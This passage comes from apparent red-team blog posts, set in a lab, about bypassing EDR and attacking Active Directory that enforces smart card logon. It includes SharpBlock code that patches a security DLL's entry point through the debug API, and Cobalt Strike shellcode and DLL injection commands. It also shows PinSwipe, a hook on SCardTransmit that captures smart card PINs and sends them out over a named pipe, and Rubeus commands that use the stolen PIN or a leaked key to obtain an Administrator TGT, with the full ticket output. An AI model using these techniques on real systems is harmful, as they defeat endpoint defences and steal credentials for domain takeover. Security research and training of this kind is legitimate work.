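    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);

    // Only allow DLLs signed by Microsoft to load into the child process.
    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    UpdateProcThreadAttribute(si.lpAttributeList, 0,
                              PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY,
                              &policy, sizeof(policy), nullptr, nullptr);

    char cmd[] = "C:\\Windows\\System32\\notepad.exe";
    if (CreateProcessA(nullptr, cmd, nullptr, nullptr, FALSE,
                       EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr,
                       &si.StartupInfo, &pi)) {
        printf("Launched PID %lu with non-Microsoft DLLs blocked\n", pi.dwProcessId);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    DeleteProcThreadAttributeList(si.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return 0;
}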

SharpBlock

Now that we have covered many of the EDR bypass solutions in use today, I'd like to introduce SharpBlock. It's just another method that I thought could be used for bypassing EDR's that I don't think I've seen used before (please let me know if you do find something).

SharpBlock can be used to launch a child process and prevent a chosen DLL from hooking into it. Since it specifically targets that DLL, it will still allow other DLLs to load into the process.

How does it work?

When SharpBlock spawns the requested child process, it uses the Windows Debug API to listen for debug events during the lifecycle of the child process. When a process is being debugged, the parent debugger process will receive these events, and the child process will be paused while they are handled. The fact that the child process is paused during these events is a key element of why this method works. So what events are fired when debugging a process?

  • CREATE_PROCESS_DEBUG_EVENT – Fired on initial process creation, including child processes.
  • CREATE_THREAD_DEBUG_EVENT – Fired when a new thread is created.
  • EXCEPTION_DEBUG_EVENT – Fired when an exception occurs.
  • EXIT_PROCESS_DEBUG_EVENT – A process has exited, including a child process.
  • EXIT_THREAD_DEBUG_EVENT – A thread has exited.
  • LOAD_DLL_DEBUG_EVENT – A DLL has loaded within a process or one of its children.
  • OUTPUT_DEBUG_STRING_EVENT – Debug strings written using the OutputDebugString API.
  • RIP_EVENT – RIP event?
  • UNLOAD_DLL_DEBUG_EVENT – A DLL has unloaded within the debugged process or its children.
Debug Events

As I’m sure you have guessed by now, the particular event we are interested in is LOAD_DLL_DEBUG_EVENT. When a debugged process or one of it’s children load’s a DLL, we want to know about it.

Once we receive the event and determine it's a DLL we would like to block, how do we actually block its behavior? Well, let's revisit our DLL entry point from our uber cool EDR, SylantStrike.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {
        //We are not interested in callbacks when a thread is created
        DisableThreadLibraryCalls(hModule);

        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_PROCESS_DETACH:

        break;
    }
    return TRUE;
}

What if we changed the entry point's behavior to the equivalent code?

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    return TRUE;
}

If we patched the code at runtime to essentially implement this behavior, the InitHooksThread function is never called, and ergo the hooks are never put in place. We can accomplish this with the 0xC3 opcode, which translates to the x86/x64 ret instruction. If we patch the entry point function with 0xC3 at the beginning, we should get the desired effect. Before we can patch the entry point though, we need to figure out where that is.

            PE.IMAGE_DOS_HEADER dosHeader = (PE.IMAGE_DOS_HEADER)Marshal.PtrToStructure(mem, typeof(PE.IMAGE_DOS_HEADER));
            PE.IMAGE_FILE_HEADER fileHeader = (PE.IMAGE_FILE_HEADER)Marshal.PtrToStructure( new IntPtr(mem.ToInt64() + dosHeader.e_lfanew) , typeof(PE.IMAGE_FILE_HEADER));

            UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
            IntPtr entryPoint;
            if ( (fileHeader.Characteristics & IMAGE_FILE_32BIT_MACHINE) == IMAGE_FILE_32BIT_MACHINE) {
                PE.IMAGE_OPTIONAL_HEADER32 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER32)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER32));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt32());

            } else {
                PE.IMAGE_OPTIONAL_HEADER64 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER64)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER64));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt64());                
            }

The code above analyses the PE header of the DLL that is in the process of being loaded to find out where the DLL entry point resides. I should note that the DLL entry point does not actually point to DllMain, but usually the C runtime initialiser that will eventually call DllMain. But for all intents and purposes we’ll call it DllMain.

Once we have calculated the final address of the entry point, we can then use the WriteProcessMemory API call to write over the entry point with the ret instruction.

                Console.WriteLine("[+] Patching DLL Entry Point at 0x{0:x}", entryPoint.ToInt64());

                if (PInvokes.WriteProcessMemory(hProcess, entryPoint, retIns, 1, out bytesWritten)) {
                    Console.WriteLine("[+] Successfully patched DLL Entry Point");
                } else {
                    Console.WriteLine("[!] Failed patched DLL Entry Point");
                }

Finally, we can trigger the process to continue on its merry path without the EDR hooks being applied.

PInvokes.ContinueDebugEvent((uint)DebugEvent.dwProcessId,                               
                        (uint)DebugEvent.dwThreadId,
                        dwContinueDebugEvent);

Demo

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -h, --help                 Display this help

SharpBlock will default to launching cmd without any arguments, but this can be overridden with the -e and -a arguments respectively. The rest of the arguments can be specified multiple times to block any DLL based on its name on disk, or on the copyright, product, or description values within its version info. A DLL's version info can be found in the Details tab when viewing the file's properties from Explorer.

Going back to our example EDR from part one, this time we load notepad.exe using SharpBlock

SharpBlock.exe -e c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike"

The SylantStrikeInject process will then detect the launch of notepad and attempt to load the active protection DLL

SylantStrikeInject.exe -p notepad.exe -d C:\tools\SylantStrike.dll
Waiting for process events
Listening for the following processes: notepad.exe 

+ Injecting process notepad.exe(6784) with DLL C:\tools\SylantStrike.dll

But this time, SharpBlock detects the loaded DLL from the description field of SylantStrike.dll’s version info and patches the entry point

SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes

[+] Launched process c:\windows\system32\notepad.exe with PID 6784
[+] Blocked DLL C:\tools\SylantStrike.dll
[+] Patching DLL Entry Point at 0x7ffd89932c74
[+] Successfully patched DLL Entry Point

Attempting to inject our shellcode from part 1 using Cobalt Strike results in the successful launch of calc and cmd, and is not blocked by SylantStrike's active DLL protection.

shinject 6784 x64 C:\Tools\SylantStrike\loader.bin

If you are interested in giving it a go, head over to the SharpBlock project on GitHub

Acknowledgements

The post Lets Create An EDR… And Bypass It! Part 2 appeared first on Ethical Chaos.

Attacking Smart Card Based Active Directory Networks

By: CCob
4 October 2020 at 19:31

Introduction

Recently I was involved in an engagement where I was attacking smart card based Active Directory networks. The fact is, though, you don't need a physical smart card at all to authenticate to Active Directory that enforces smart card logon. The attributes of the certificate determine if it can be used for smart card based logon, not the origin of the associated private key. So if you have access to the corresponding private key, smart card logon can still be achieved.

When a user has been enrolled for smart card based login, in its default configuration the domain controller will accept any certificate signed by its trusted certificate authority that meets the following specification:

  • CRL Distribution Point must be populated, online and available
  • Key Usage for the certificate is set to Digital Signature
  • Enhanced Key Usages:
    • Smart Card Logon
    • Client Authentication (Optional, used for SSL based authentication)
  • Subject Alternative Names containing user UPNs
  • Fully distinguished AD name of the user as the Subject

Additionally, if the Allow certificates with no extended key usage certificate attribute group policy is enabled, the enhanced key usages don't need to be present at all. This can lead to the abuse of other types of certificates issued to domain users or computers. Check out the post from CQURE Academy on how this policy can be abused.

Typical certificate capable of PKI/smart card login

This particular journey of mine then began: how can we take leaked private keys or physical smart card PINs and use them to our advantage?

PKINIT

As many of you are aware, modern day Active Directory uses Kerberos for authenticating to the domain. Tools like Rubeus, Mimikatz, Kekeo and impacket can be used to abuse Kerberos to the attacker's advantage.

So where does PKI based authentication fit in with Kerberos? Back in 2006, a combined effort between Microsoft and the Aerospace Corporation submitted RFC 4556. This introduced public key cryptography support for Kerberos pre-authentication.

Pre-authentication is Kerberos's answer to offline brute force attacks on an account password. Without pre-authentication enabled on an AD account, users are vulnerable to AS-REP roasting attacks. With the introduction of pre-authentication, the initial AS-REQ Kerberos request contains an encrypted timestamp. The key used to encrypt it is derived from the user's password. This proves to the KDC that the user requesting the login does know the account password. Therefore, the KDC is happy to send back an encrypted AS-REP (response to AS-REQ) tied to the user's password. The fact that the pre-auth data contains a timestamp also prevents replay attacks. If the pre-authentication data is not valid, the KDC returns an error, and no brute forcing of the AS-REP response key is possible. If an attacker is suitably placed within a network to spy on Kerberos responses though, AS-REP roasting is still possible.

PKI based authentication works in a similar fashion. It uses Kerberos pre-authentication to prove the user is who they say they are. Again, this uses a timestamp, but instead of encrypting the message with the user's password-derived key, it signs the message in the form of a PKCS #7 Cryptographic Message Syntax (CMS) payload using the private key belonging to the certificate. This private key can be present on a physical smart card or stored in other forms too, including not so secure methods. Once the KDC validates the signature of the CMS payload and everything checks out, an AS-REP is sent back to the client. One final detail of PKINIT is the encryption used for the AS-REP response. Because no password is used during a PKI based Kerberos login, the user key is unknown to the client. To combat this, the AS-REP is either encrypted using a key obtained via the Diffie-Hellman key exchange algorithm, or it is encrypted with the public key of the certificate used in the initial AS-REQ request. This initial request contains the details of which method is preferred.

From here on out, everything else remains the same. The client will have a valid TGT that can be used to request TGS tickets. The certificate is no longer used for the lifetime of the TGT, which will generally remain valid for 7 days before the private key for the certificate is needed again. That's not to say the private key goes unused for 7 days during Windows logon. If the machine is locked or a user has logged out, Windows will enforce an authentication as it does with a password based login. But from an attacker's perspective, this is irrelevant if they have obtained a TGT.

More in depth details on interactive and network based logon using smart cards can be found from the MS-PKCA documentation.

Rubeus with PKINIT

So I started working on adding PKINIT support to Rubeus and created a pull request. I have to give a big shout out to the Kerberos king @SteveSyfus. Kerberos.NET was a massive help when trying to understand the inner workings of PKINIT, and some modified code worked its way into Rubeus. Also a tip of the hat to @gentilkiwi for Kekeo/Mimikatz, and to @harmj0y and the other Rubeus contributors. I wouldn't have had such a great tool to start with in the first place if it wasn't for their hard work.

PKCS#12 Based Authentication (PFX)

The first attack scenario I'll cover is the exposure of a user's private key. We can use a PKCS#12 certificate store which contains a user's certificate along with the corresponding private key to generate a Kerberos TGT. Generating the pfx will depend on how you have managed to expose private keys in the first place. You can use OpenSSL to generate a PKCS12 store once you have the private key blob and corresponding certificate, like this:

openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 

Once you have generated a valid certificate store, we can use the new addition to Rubeus to request a TGT. If you decide to protect the certificate store with a password, you can add the /password option to the command line.

Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local

Rubeus will then generate a PKINIT based AS-REQ using the supplied certificate store to authenticate the user. If everything checks out and the KDC is happy you should get something similar to this:


   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  02/10/2020 16:01:12
  EndTime               :  03/10/2020 02:01:12
  RenewTill             :  09/10/2020 16:01:12
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  6tIiFytU5V2cgSpXt8skdw==

The resulting Base64 encoded .kirbi string can then be used for obtaining TGS tickets from the KDC as normal.

Physical Smart Card Login

After I managed to get PKINIT working with a certificate store, it got me thinking about how we could use a physical smart card too. The main obstacle to using smart cards once a compromise of a user's machine occurs is of course the PIN. Without knowing the PIN we cannot generate a valid AS-REQ. Brute forcing is out of the question, since after 3 invalid attempts the card will lock you out.

One option is to capture the PIN when a user is required to unlock the smart card. This could be for a machine unlock/login, website login or other services on the network that requires smart card authentication.

After a little investigation this led me to the WinSCard DLL. This DLL is the gateway to communicating with the Smart Card service. The service then controls the resources and communication with the smart cards themselves. Generally anything that communicates with a smart card on Windows will use the WinSCard API. This also includes LSASS during login and the Internet Explorer / Edge browser when authenticating to websites that require smart card authentication.

The specific export from the WinSCard.dll that interested me was the SCardTransmit API. This is the API used to transmit what the smart card ISO/IEC 7816 specification calls an Application Protocol Data Unit (APDU). This is the lowest level transmission unit that is used to communicate with a smart card.

Command APDU
  • CLA (1 byte) – Instruction class – indicates the type of command, e.g. interindustry or proprietary
  • INS (1 byte) – Instruction code – indicates the specific command, e.g. “write data”
  • P1-P2 (2 bytes) – Instruction parameters for the command, e.g. offset into file at which to write the data
  • Lc (0, 1 or 3 bytes) – Encodes the number (Nc) of bytes of command data to follow: 0 bytes denotes Nc=0; 1 byte with a value from 1 to 255 denotes Nc with the same value; 3 bytes, the first of which must be 0, denotes Nc in the range 1 to 65 535 (all three bytes may not be zero)
  • Command data (Nc bytes) – Nc bytes of data
  • Le (0, 1, 2 or 3 bytes) – Encodes the maximum number (Ne) of response bytes expected: 0 bytes denotes Ne=0; 1 byte in the range 1 to 255 denotes that value of Ne, or 0 denotes Ne=256; 2 bytes (if extended Lc was present in the command) in the range 1 to 65 535 denotes Ne of that value, or two zero bytes denotes 65 536; 3 bytes (if Lc was not present in the command), the first of which must be 0, denote Ne in the same way as two-byte Le

Response APDU
  • Response data (Nr bytes, at most Ne) – Response data
  • SW1-SW2, the response trailer (2 bytes) – Command processing status, e.g. 90 00 (hexadecimal) indicates success
APDU Structure from Wikipedia

If we hook this API, then we should be able to spy on APDUs transmitted to the card.

LONG SCardTransmit(
  SCARDHANDLE         hCard,
  LPCSCARD_IO_REQUEST pioSendPci,
  LPCBYTE             pbSendBuffer,
  DWORD               cbSendLength,
  LPSCARD_IO_REQUEST  pioRecvPci,
  LPBYTE              pbRecvBuffer,
  LPDWORD             pcbRecvLength
);

The pbSendBuffer parameter contains the APDU packet that is making its way to the card and the pbRecvBuffer will contain the response from the smart card.

Whilst the ISO smart card specification has recommendations for certain command classes and command data structures, these are generally application specific and not defined by the ISO smart card specification itself. So where do we look for answers now? For identity and access purposes NIST produced the Personal Identity Verification (PIV) SP 800-73-4 specification. Without going into too much detail, the specification covers how the smart card should handle certificates enrolled onto the device, along with all the APDUs needed to implement the specification. The area of interest within the PIV specification is section 3.2.1 VERIFY Card Command. The section describes how the VERIFY APDU is used to validate the PIN prior to allowing access to private keys stored on the card.

So armed with the information from the ISO specification along with section 3.2.1 from the PIV specification, we should be able to produce a reliable hook to capture a PIN transmitted to the card. I covered API hooking in my EDR series of blog posts, so the methods used here are the same. Here is the implementation of the hooked API.

DWORD WINAPI SCardTransmit_Hooked(SCARDHANDLE hCard,
	LPCSCARD_IO_REQUEST pioSendPci,
	LPCBYTE             pbSendBuffer,
	DWORD               cbSendLength,
	LPSCARD_IO_REQUEST  pioRecvPci,
	LPBYTE              pbRecvBuffer,
	LPDWORD             pcbRecvLength) {
	
	char debugString[1024] = { 0 };
	DWORD result = pOriginalpSCardTransmit(hCard, pioSendPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);
	//Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
	if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {
		//Check card response status for success
		bool success = false;
		if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
			success = true;
		}
		char asciiPin[9];
		sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false", 
			GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));
		SendPINOverPipe(debugString);			
	}
	return result;
}

The first thing the hooked function does is call the original SCardTransmit function. Not only are we interested in the request, we also want to know the response from the card. This way we can determine whether the PIN transmitted to the card was correct too. The function then looks for the VERIFY APDU to isolate commands specific to verifying the PIN. Once we have determined a VERIFY is in progress, we check the result; 0x90 0x00 signifies the PIN was validated correctly. Next, we extract the PIN from the send buffer at offset 5 (the command data within the APDU structure). Finally, we transmit the PIN details over a named pipe, ready for capture by a receiving application interested in the data.
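To make those offsets concrete, here is a hypothetical VERIFY APDU as it might appear in pbSendBuffer for the made-up PIN 123456, following the PIV convention of ASCII digits padded to 8 bytes with 0xFF (illustrative only):

// Hypothetical PIV VERIFY APDU for the example PIN "123456":
// CLA=00, INS=20 (VERIFY), P1=00, P2=80 (PIV Card Application PIN), Lc=08,
// followed by the PIN in ASCII padded to 8 bytes with 0xFF.
const unsigned char verifyApdu[] = {
    0x00, 0x20, 0x00, 0x80, 0x08,              // CLA, INS, P1, P2, Lc
    '1', '2', '3', '4', '5', '6', 0xFF, 0xFF   // command data (the PIN)
};
// In the hook above: pbSendBuffer[1] == 0x20 identifies the VERIFY command,
// pbSendBuffer[3] selects the PIN type, pbSendBuffer[4] holds the PIN length
// and pbSendBuffer + 5 is where the PIN itself starts.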

Packaging this functionality into a DLL that is also capable of being reflectively loaded will allow the DLL to be injected into our process of interest without hitting the disk. You can find the complete PinSwipe project on my GitHub repo, which also includes a .NET PinSwipeListener console app that will list certificates found with the Smart Card Logon Enhanced Key Usage attribute and then set up a listening pipe to capture swiped PINs.

Demo

In this assumed breach scenario I already have a Cobalt Strike beacon connected to a victim workstation. I am using an Administrator account but a limited account will work too. The PinSwipe DLL can be injected into a high privilege process like lsass when Administrative access is obtained which enables swiping PINs during login, but with limited user level access you will be restricted to injecting into user mode processes like Internet Explorer etc…

So first of all let’s launch PinSwipeListener, this will dump out certificate information for user certificates that have the Smart Card Logon EKU.

beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca

With the listener now in place we need to choose which processes to inject PinSwipe.dll into. Targets like Internet Explorer, Chrome etc. are good choices since these will regularly pop up requesting PINs in a smart card authenticated environment. For the demo I was running Internet Explorer, which was running under PID 2678. I should note that IE, like Chrome, launches child processes for the various tabs in use, so you'll need to inject into the correct process. Other more advanced aggressor scripts could be used that continually look out for new IE processes and inject into them all, but I will leave that as an exercise for the reader.

beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678

Once a user enters their PIN into the dialog, PinSwipe should do its thing and capture the request and send it over the named pipe to PinSwipeListener.

IE presenting PIN dialog for end user
[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456

The output from PinSwipe will indicate whether the entered PIN was correct, in addition to the PIN entered. Once you have captured the PIN you can use the new Rubeus feature to request a TGT using the user's physical smart card. This time the /certificate parameter will reference the thumbprint or subject name of the certificate to use, not a pfx file like in the first demo. The output from PinSwipeListener will help when supplying this argument.

beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0 
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  04/10/2020 19:55:29
  EndTime               :  05/10/2020 05:55:29
  RenewTill             :  11/10/2020 19:55:29
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
